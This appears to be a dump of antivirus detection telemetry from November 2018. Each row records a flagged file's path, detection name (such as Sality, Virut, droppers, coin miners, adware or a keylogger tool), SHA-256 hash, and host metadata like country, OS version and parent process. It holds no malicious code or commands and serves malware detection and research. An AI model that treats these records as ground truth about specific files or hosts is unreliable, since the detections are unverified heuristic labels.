  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:25:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='perlglob.exe', filepath='C:\\Perl\\bin\\perlglob.exe', filesize=96000, name='W32/Sality.AT.#M1.#R1'), hash='2755e1c802e123e0d3370c324f18223b8196e69e3617d89375490758484e5406', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:EJVdT4oUD0qlV0c5.1', country='CI', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-04T09:05:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='aaab96d68a071596f49a1d75aa291701959d5983172ee486d07cce65fe3a1607', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T05:29:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ocs_v71b.exe', filepath='F:\\USERPROFILE\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\ut\\totalcmd\\TOTALCMD64.EXE', parentsize=8925320, timestamp='2018-11-04T19:05:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T18:36:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='office 20101.exe', filepath='F:\\Office 20101.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='NE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-04T17:20:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:24:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210249-b0a95c4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1da9bed9\\AVSCAN-20181104-210151-A6A45549\\AVSCAN-20181104-210249-B0A95C4E', filesize=9344000, name='TR/Black.Gen2.#M1.#R1'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:02:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apds.dll', filepath='D:\\Windows\\SoftwareDistribution\\Download\\6d722766bb82e0437d0d3556b5f02309\\x86_microsoft-windows-servicingstack_31bf3856ad364e35_6.1.7601.23505_none_0bfc08bf3ea166ba\\apds.dll', filesize=1856000, name='W32/Ramnit.CD.#M1.#R1'), hash='10bae81cbdd98a83487262b33e98969a1c733aa6a40c791b6737e712889e6e02', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T11:01:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='play cracked.exe', filepath='\\?\\D:\\Minecraft - Star Wars\\play cracked.exe', filesize=192000, name='TR/Rogue.192000.9.#M1.#R1'), hash='767e7cef883679bed2576504ca4cf079d8cf48360f85e2d79fc4d41f73a2610e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:48:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2543273\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:55:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093316-2bcc0de7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1683e6be\\AVSCAN-20181104-090613-498D57A5\\AVSCAN-20181104-093316-2BCC0DE7', filesize=512000, name='TR/Crypt.XPACK.cbb342.#M1.#R1'), hash='cbb3429b0c8a4b695f67d644debf3873aa9eed03a12d761c552ef9b382e1ec85', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:33:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215304-589676e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215304-589676E6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:53:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='exhibit2.exe', filepath='H:\\IDATA  250G\\SOFT CH\\图像\\声影制作专家3d模板(绝对精彩版)\\3d模板\\exhibit2.exe', filesize=320000, name='TR/Dropper.Gen2.#M300.#R100747'), hash='2d471d4c9e75f5bb3d725f0ce30eedf3823f8ced124f712b673acd5d2e124038', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:05:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200808-26566f29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200808-26566F29', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:08:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145700-07ba1ce1', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-145700-07BA1CE1', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:57:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a190_calc.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\A190_Calc.exe', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='04239a5a53d71e87acf2a3ae5873657ccbbbd8fd6e6c39562ccaa8fe2859b7dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:57:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxa7155.tmp', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxa7154.tmp\\dxa7155.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b6cd48e429aaa624ef27019a367e51cb048a3784ab5637011dd3166129e56bc4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B6CD48E429AAA624EF27019A367E51CB048A3784AB5637011DD3166129E56BC4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b6cd48e429aaa624ef27019a367e51cb048a3784ab5637011dd3166129e56bc4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:40:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a48fec91bcba9d171bd1729342e7e51e138474171d3a93dff1765e0c33a3a9be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A48FEC91BCBA9D171BD1729342E7E51E138474171D3A93DFF1765E0C33A3A9BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a48fec91bcba9d171bd1729342e7e51e138474171d3a93dff1765e0c33a3a9be', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:04:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:36:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ocs_v71b.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:14:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T10:48:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:50:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='C:\\Windows\\System32\\config\\aol\\1\\2\\3\\1\\1\\1\\1\\1\\1\\2\\3\\1\\1\\1\\app\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='9d4f0082ca27b8ec25f8b7ba843e8ee360efab2c8fcdf00066e6700bdfcbc75e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:22:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe63_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe63 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T07:23:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-041727-30eba387', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-041727-30EBA387', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:19:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T11:41:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a54450a07b3902a64c3412b0ddd54ebaab627d053a397c243676c2c2d45f3cc9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A54450A07B3902A64C3412B0DDD54EBAAB627D053A397C243676C2C2D45F3CC9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a54450a07b3902a64c3412b0ddd54ebaab627d053a397c243676c2c2d45f3cc9', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Program Files (x86)\\InstallShield Installation Information\\{18443A58-1497-11D6-9C37-0002A51A160C}\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='904ef6cebeaf0e9872460b8d7637e040e0b38cf93d8cbf3a28cc423fef722303', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wolfmp.exe', filepath='d:\\العاب\\return to castle wolfenstein h\\WolfMP.exe', filesize=1024000, name='TR/Crypt.XPACK.Gen2.#M300.#R100504'), hash='f7dcc9f0a5999f645057f5e543f969135cd62c1a3f57530dd96f31e64deabf24', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='axanjhek.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\axaNjheK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100811-b76e4a1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9281dc5a\\AVSCAN-20181102-100637-AA2865DA\\AVSCAN-20181102-100811-B76E4A1D', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='8527ceb21de1d07165c27a128c66e4bb4827a95ca6f29aa43683210ac12754c0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:08:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:37:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='saper.exe', filepath='N:\\Disk D\\Restore\\Saper\\Saper.exe', filesize=896000, name='BDS/Hupigon.khxi.#M1.#R1'), hash='a883b670c9b5753f61478450b0f085a17d806088d9670199c5eb668f02b28baa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T16:52:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='cb507beaed240120c70b8c22735470942cca04c81eb508b6ba86e0c786ea180a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T07:39:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082258-232a02fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181102-082208-1984215B\\AVSCAN-20181102-082258-232A02FC', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000fea01', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000fea01', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloader-fuer-teamviewer_setup.exe', filepath='H:\\04_Back-UP_Software\\Downloads\\Fernwartung\\Downloader-fuer-TeamViewer_Setup.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='cf4df0069f8aa4b737a5ed9cd4c662ff20569888e7e7ede4ea95ba351e348979', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\FreeFileSync\\Bin\\FreeFileSync_x64.exe', parentsize=11977720, timestamp='2018-11-02T12:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kibitzing.exe', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kibitzing.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6qknn5y37.vir', filepath='\\\\?\\C:\\Program Files\\6QKNN5Y378\\6QKNN5Y37.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.6be9607ad71749a5996148fc27048ffd.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.6be9607ad71749a5996148fc27048ffd.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='block 2.exe', filepath='F:\\ASANTE PRESBYTERY_LMFDP_Handouts\\BLOCK 2.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_sfx.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\as\\_SFX\\_SFX.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='knqu7i7cnzb99k.x64.dll#e636a0613ccdeaaf', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\v1\\20181101.172246\\228\\YOUTUBEADBLOCKER\\knqU7i7cnzb99k.x64.dll#E636A0613CCDEAAF', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='dc388d7da4f5b4676b5529a21449e29420868e8f77958ca31c77ba35114412ad', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:09:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='D:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M2.#R5505'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:50:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-071957-b249bb1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-071957-B249BB1C', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='aba77a91f42d6333b4f699c3952dfd435b134cd8dfa9eb004380c6f3247c47bc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090432-e3e5cc7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdbb2d48\\AVSCAN-20181102-085611-9B1742F6\\AVSCAN-20181102-090432-E3E5CC7A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9e3d68102514cb64cce77a8645febc9ea6b04533ea84773741299666deb52220', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='serial.exe', filepath='\\\\?\\C:\\Program Files\\aBusinessPlus\\SERIAL.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='ea102d93e8dc6ba57074ba13208d652b38148aff1e605dfe7454f396ed549e3d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:34:36Z'), dt=datetime.date(2018, 11, 2)),
